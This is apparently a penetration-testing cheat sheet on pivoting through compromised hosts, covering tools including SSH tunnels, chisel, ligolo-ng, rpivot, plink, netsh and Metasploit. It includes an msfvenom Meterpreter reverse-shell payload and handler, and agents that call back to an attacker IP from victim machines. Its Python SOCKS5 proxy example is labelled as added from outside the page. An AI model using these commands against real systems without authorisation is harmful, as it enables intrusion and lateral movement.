Pivoting / Forwarding
00. Basic
## ------------------| Check arp table
arp -an
Port forwarding from another machine into the Kali VM's VPN
## ------------------| Method I (SSH Reverse Tunnel)
### Machine-A (192.168.1.130) – Source Machine (no VPN)
### Machine-B (192.168.10.3) – Relay Machine (inside the VM, holds the VPN 10.10.xx.xxx)
### Goal: HTTP (port 80) traffic from Machine-A to a VPN host (10.10.11.123) must leave through Machine-B's VPN.
### Step 1: Open an SSH reverse tunnel from Machine-B (the VPN side) back to Machine-A
### Run on Machine-B. It opens a listener on Machine-A:8080 (bound to 127.0.0.1 by default); every connection to it comes out of Machine-B towards 10.10.11.123:80:
ssh -R 8080:10.10.11.123:80 Machine-A
### Step 2: Redirect Machine-A's outbound port 80 into the tunnel
### Run on Machine-A once the SSH session is up. REDIRECT rewrites locally generated packets to 127.0.0.1:8080, which is where the -R listener sits (drop -d to redirect all outbound port 80):
sudo iptables -t nat -A OUTPUT -p tcp -d 10.10.11.123 --dport 80 -j REDIRECT --to-port 8080
### The tunnel must be opened from the machine that can reach the VPN host: run the other way round (ssh -R from Machine-A to Machine-B) the listener would sit on Machine-B and its connections would exit from Machine-A, which has no route to 10.10.x.x.
## ------------------| Method II (SOCKS Proxy)
### Full TCP redirection through a SOCKS proxy (no root needed on either machine)
### Step 1: Open a dynamic forward from Machine-A to Machine-B
### Run on Machine-A. Machine-B makes the outbound connections (and, with socks5h, the DNS lookups), so they leave through its VPN:
ssh -N -D 127.0.0.1:1080 Machine-B
### Step 2: Point the clients on Machine-A at the proxy
### Run on Machine-A. curl and friends honour these variables; tools that ignore them go through proxychains instead. Only TCP is proxied: no ICMP, no UDP, no raw sockets.
export http_proxy="socks5h://127.0.0.1:1080"
export https_proxy="socks5h://127.0.0.1:1080"
## ------------------| Method III (iptables & NAT) - Requires Root Access on Both Machines
### Step 1: Enable IP forwarding and NAT on Machine-B
### Run on Machine-B (tun0 is assumed to be the VPN interface; check with ip addr):
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.10.11.123:80
sudo iptables -A FORWARD -p tcp --dport 80 -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE  ## without this the VPN host answers to 192.168.1.130, which it cannot reach
### Step 2: Route Machine-A's traffic through Machine-B
### Run on Machine-A (192.168.10.3 must be reachable on-link or via an existing route, otherwise the kernel rejects the gateway):
sudo ip route add 10.10.11.123 via 192.168.10.3
01. Port Forwarding
## ------------------| Agent [target/victim computer]
## Windows (download the latest release on our box, transfer agent.exe to the target, run it there)
wget -q --show-progress $(wget -qO- https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep "browser_download_url" | grep "windows_amd64.zip" | grep agent | awk -F '"' '{print $4}') -O /tmp/agent-windows.zip
unzip -j /tmp/agent-windows.zip -d $PWD agent.exe
.\agent.exe -connect <MyIP>:11601 -ignore-cert   ## -ignore-cert because the proxy runs with -selfcert
## Linux
wget -q --show-progress $(wget -qO- https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep "browser_download_url" | grep "linux_amd64.tar.gz" | grep agent | awk -F '"' '{print $4}') -O /tmp/agent-linux.tar.gz
tar -xvf /tmp/agent-linux.tar.gz -C $PWD agent
./agent -connect <MyIP>:11601 -ignore-cert
## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert          ## listens on 0.0.0.0:11601 with a self-signed cert (hence -ignore-cert on the agent)
session                    ## at the ligolo-ng prompt: select the agent that connected
ifconfig                   ## at the prompt: the agent's interfaces, i.e. the subnets you can now reach
sudo ip route add <IPRange>/24 dev ligolo ## in a second shell; Ex: 172.17.0.0/24
start                      ## back at the prompt: bring the tunnel up
## Scan live hosts
fping -a -g 172.17.0.0/24
01.1 SSH Port Forward
## -N Do not execute a remote command. This is useful for just forwarding ports.
## ~C opens the ssh escape command line inside a running session (type it right after a newline); forwards are added there with the same -L/-R/-D syntax
~C
## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
## <host_port> opens on our machine; connections to it leave the SSH server towards <remote_ip>:<remote_port>, as seen from the server
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
autossh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
## ex: ssh -L 3306:127.0.0.1:3306 <user>@<sshserverip>  (127.0.0.1 is resolved on the SSH server, so this reaches the server's own MySQL)
## 3306 is the victim's machine port
## 1337 is our machine port
## same forward, added from inside a running session:
ssh> -L 1337:127.0.0.1:3306
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>
## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
## <remote_port> opens on the SSH server; connections to it come back through the tunnel to <remote_ip>:<host_port>, as seen from the client
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>
## 3306 is the victim's machine port (the victim is the SSH client here: this command runs on the compromised box)
## 1337 is our machine port (we are the SSH server; the listener binds to 127.0.0.1 unless sshd has GatewayPorts yes)
ssh -R 1337:127.0.0.1:3306 <user>@<our_ip>
## ------------------| Dynamic Port Forward (Use of proxychain)
## from inside a running session:
ssh> -D 1080
## or on the command line; -f -N backgrounds it once the connection is up
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>
## Config proxychain: add the SOCKS listener at the end of the [ProxyList] section
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
## Launch nmap: only full TCP connects go through SOCKS, so use -sT, and -Pn because ICMP/SYN host discovery is not proxied
proxychains nmap -sT -Pn 172.16.1.0/24
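What the `-D` listener above (and `chisel ... socks`, `auxiliary/server/socks_proxy` and every `socks5` line in proxychains.conf) actually speaks is a SOCKS5 CONNECT exchange. The following is an added example, not from this page or from OpenSSH/proxychains: a loopback SOCKS5 proxy plus the client-side handshake, with a constructed echo service standing in for the host behind the pivot. It assumes nothing is listening on loopback port 1, which it uses to show the refused case (reply code 5), and it handles the IPv4 and domain-name address types only (the domain type is what `socks5h://` sends, so the proxy resolves the name).

```python
# Added example (not from the page): a loopback SOCKS5 CONNECT proxy, the protocol behind `ssh -D`,
# `chisel ... socks` and msf socks_proxy, plus the client handshake proxychains does for a program.
import socket, struct, threading
class SocksError(ConnectionError):
    """args[0] is the SOCKS5 reply code (RFC 1928): 1 general, 5 refused, 7 bad cmd, 8 bad atyp."""

def _recvn(sock, n):
    # Read exactly n bytes: a handshake must never over-read into tunnelled payload.
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf

def _pump(src, dst):
    # Copy one direction until EOF, then half-close dst so the far end sees EOF; on error, tear down.
    try:
        while data := src.recv(65536):
            dst.sendall(data)
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        dst.close()

def _socks5(client):
    # Server side of one SOCKS5 CONNECT, no-auth only. Returns True once the tunnel is running.
    ver, nmethods = _recvn(client, 2)                          # greeting: VER NMETHODS, then METHODS
    if ver != 5 or 0 not in _recvn(client, nmethods):
        client.sendall(b"\x05\xff")                            # 0xff = no acceptable method
        return False
    client.sendall(b"\x05\x00")
    _ver, cmd, _rsv, atyp = _recvn(client, 4)                  # request: VER CMD RSV ATYP ADDR PORT
    if atyp == 1:
        host = socket.inet_ntoa(_recvn(client, 4))
    elif atyp == 3:                                            # domain name: resolved HERE (socks5h)
        host = _recvn(client, _recvn(client, 1)[0]).decode()
    else:
        client.sendall(b"\x05\x08\x00\x01" + bytes(6))         # 8 = address type not supported
        return False
    port = struct.unpack("!H", _recvn(client, 2))[0]
    remote, rep = None, 7                                      # 7 = command not supported
    if cmd == 1:                                               # CONNECT
        try:
            remote, rep = socket.create_connection((host, port), timeout=5), 0
        except OSError as e:
            rep = 5 if isinstance(e, ConnectionRefusedError) else 1   # 5 refused, 1 general
    client.sendall(b"\x05" + bytes([rep]) + b"\x00\x01" + bytes(6))   # reply; BND = 0.0.0.0:0
    if remote is not None:
        remote.settimeout(None)                                # an idle tunnel must not time out
        for a, b in ((client, remote), (remote, client)):
            threading.Thread(target=_pump, args=(a, b), daemon=True).start()
    return remote is not None

def _serve(handler):
    # Listen on an ephemeral 127.0.0.1 port, run handler per connection; returns the port.
    srv = socket.create_server(("127.0.0.1", 0))
    def run(conn):
        try:
            if not handler(conn):                              # True means the handler kept conn
                conn.close()
        except (OSError, ValueError):
            conn.close()
    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=run, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def start_socks5_proxy():  # returns the port for the `socks5 127.0.0.1 <port>` proxychains line
    return _serve(_socks5)
def start_echo_target():  # constructed stand-in for the internal service behind the pivot
    return _serve(lambda c: _pump(c, c))

def socks5_connect(proxy_port, host, port):
    """Client side (what proxychains does): a socket tunnelled to host:port, or SocksError."""
    s = socket.create_connection(("127.0.0.1", proxy_port))
    s.sendall(b"\x05\x01\x00")                                 # VER=5, offer no-auth only
    if _recvn(s, 2) != b"\x05\x00":
        s.close()
        raise SocksError(0xff)
    hb = host.encode()                                         # ATYP=3: let the proxy resolve it
    s.sendall(b"\x05\x01\x00\x03" + bytes([len(hb)]) + hb + struct.pack("!H", port))
    _ver, rep, _rsv, atyp = _recvn(s, 4)
    _recvn(s, (_recvn(s, 1)[0] if atyp == 3 else 4 if atyp == 1 else 16) + 2)   # skip BND.*
    if rep != 0:
        s.close()
        raise SocksError(rep)
    return s

def roundtrip(proxy_port, target_port, payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Send payload through the proxy to target_port on loopback; return what comes back."""
    with socks5_connect(proxy_port, "127.0.0.1", target_port) as s:
        s.sendall(payload)
        return _recvn(s, len(payload))
```

`start_socks5_proxy()` returns a port you could put on the `socks5 127.0.0.1 <port>` line and then run `proxychains curl` against; `roundtrip(proxy, start_echo_target())` shows one complete CONNECT, and `roundtrip(proxy, 1)` raises `SocksError(5)` because the proxy's own connect was refused, which is exactly the failure proxychains reports as a denied chain. The same no-auth exchange is what `nmap -sT` goes through for every port it probes, which is why SYN scans and ping probes cannot be proxied.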
01.2 Using socat
## ------------------| Plain TCP relay
## listen on 4444 on every interface and relay each connection (fork) to the local CUPS port
socat TCP-LISTEN:4444,fork TCP:127.0.0.1:631
## bind the listener to one address only (here our VPN IP) and relay to the local MySQL
socat TCP-LISTEN:4444,fork,bind=10.10.14.26 TCP:127.0.0.1:3306
## ------------------| Send SMB traffic from the Kali VM to a Windows VM (port 445 needs root to bind)
sudo socat TCP-LISTEN:445,fork,reuseaddr TCP:<WINDOWS_VM_IP>:445
01.3 Using chisel
## ------------------| Reverse port forward
## Server side (our machine); --reverse lets clients open listeners on the server
./chisel server --reverse --port 1234
## Client side (compromised machine): R:<our_port>:<host>:<port> opens <our_port> on our machine and relays to host:port as seen from the client
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001
## ------------------| SOCKS5 (With Proxychains)
## Server side
chisel server --reverse --port 1234
## Client side: opens a SOCKS5 listener on our machine whose connections exit from the client; 0.0.0.0 exposes that pivot to anyone who can reach us, so prefer R:127.0.0.1:1080:socks
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf
socks5 127.0.0.1 1080
## Use nmap with proxychains (-sT -Pn, as with the SSH dynamic forward)
01.4 Using sshuttle
## ------------------| For all routes (VPN-like: every TCP destination goes through the SSH host; needs root locally for the firewall rules and python on the remote side; add --dns to tunnel DNS as well)
sudo sshuttle -vvr <user>@<sshserverip> 0/0
sudo sshuttle -vr <user>@<sshserverip> 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr <user>@<sshserverip> 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
## ------------------| For specific route
sudo sshuttle -vr <user>@<sshserverip> 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"
01.5 Using ncat tunnel
## ------------------| Set ncat on the target machine: listen on 1337 and act as an HTTP CONNECT proxy
ncat -vv --listen 1337 --proxy-type http
## ------------------| On the attacker machine add it to proxychains (10.10.110.100 is the target running ncat; printf, because plain echo does not expand \t in bash)
printf 'http\t10.10.110.100\t1337\n' | sudo tee -a /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf
## ------------------| Then use proxychains
proxychains nmap -sT -Pn 172.16.1.0/24
01.6 Using httptunnel (hts / htc)
## ------------------| On Server (compromised machine): hts answers HTTP on 1337 and forwards the tunnelled bytes to its local 3306
hts --forward-port localhost:3306 1337
## ------------------| On Client (our machine): htc listens on local 3306 and wraps it in HTTP towards the compromised host
htc --forward-port 3306 <compromised_ip>:1337
01.7 Using Plink.exe
cp /usr/share/windows-resources/binaries/plink.exe .
## on the Windows box: open 445 on our machine, relayed back to the box's own 445
.\plink.exe root@<OURIP> -R 445:127.0.0.1:445
## non-interactive: echo y accepts our host key;  binding to <our_ip> instead of 127.0.0.1 needs GatewayPorts yes in our sshd_config
cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.0.1:3306 <our_ip>
01.8 Using netsh.exe
## 3306 is the port on the internal host <remote_ip> we want to reach
## 1337 is the listener opened on the compromised machine (needs an admin shell and the IP Helper service running)
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>
## Add firewall rule for the same listener port
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=1337 action=allow
01.9 Using rinetd
## ------------------| Forward traffic that reaches our port 80 on to google.com, for a restricted device that can only talk to us
sudo vi /etc/rinetd.conf
### Jump to line number 19 and add the following line (bindaddress bindport connectaddress connectport)
0.0.0.0 80 <GoogleIPAddress> 80
### Restart service
sudo service rinetd restart
### Success? (on the restricted machine)
nc -znv <AttackerIP> 80
01.10 Using rpivot (reverse SOCKS4)
## ------------------| Start server on attacker machine: 8989 receives the client, 1080 is the local SOCKS4 listener
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989 --proxy-ip 127.0.0.1 --proxy-port 1080
## ------------------| Start rpivot on compromised machine (connects back to us; the repo's client.py does the same on Linux)
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989
## ------------------| Proxy: rpivot speaks SOCKS4, so the proxychains line is socks4, not socks5
/etc/proxychains.conf
socks4 127.0.0.1 1080
proxychains nmap -sT -Pn -p 80 <IP>
01.11 Using Metasploit with Meterpreter
## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin
## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i <session_id>
## ------------------| Method 0x01 (route + SOCKS proxy: reach a whole subnet)
## at the msf > prompt: send traffic for the internal subnet through the session
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run
## ------------------| Method 0x02 (single port forward)
## !! You must be on the " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
## -l (8003) listens on our machine
## -r (172.17.0.2) internal host reachable from the compromised machine
## -p (3306) port on that internal host
## then you can use 127.0.0.1:8003 from your end